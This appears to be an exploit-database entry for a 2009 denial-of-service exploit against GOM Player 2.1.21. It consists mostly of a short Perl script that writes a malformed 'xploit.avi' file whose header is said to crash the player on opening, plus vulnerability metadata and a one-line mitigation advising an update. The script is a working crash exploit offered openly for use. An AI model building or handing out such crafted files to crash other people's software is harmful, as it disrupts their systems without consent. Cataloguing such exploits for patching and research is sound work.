header-logo
Suggest Exploit
vendor:
GOM Player
by:
Z
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: GOM Player
Affected Version From: 2.1.21
Affected Version To: 2.1.21
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

GOM PLAYER V 2.1.21 -last- DoS (.avi file)

This exploit creates an AVI file with a header containing a malicious code which causes GOM Player version 2.1.21 to crash when the file is opened.

Mitigation:

Update to the latest version of GOM Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl

print "
[~] GOM PLAYER V 2.1.21 -last- DoS (.avi file)
[~] EN|GMA7 Team ~
[~] By Z
[~] www.enigma7.net<http://www.enigma7.net>
";


$bf = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

open(file, "> xploit.avi");
print (file $bf);
print "\n\n[+] Done!\n
[+] AVI file created..\n
[+] Z-at-Enigma7.net\n";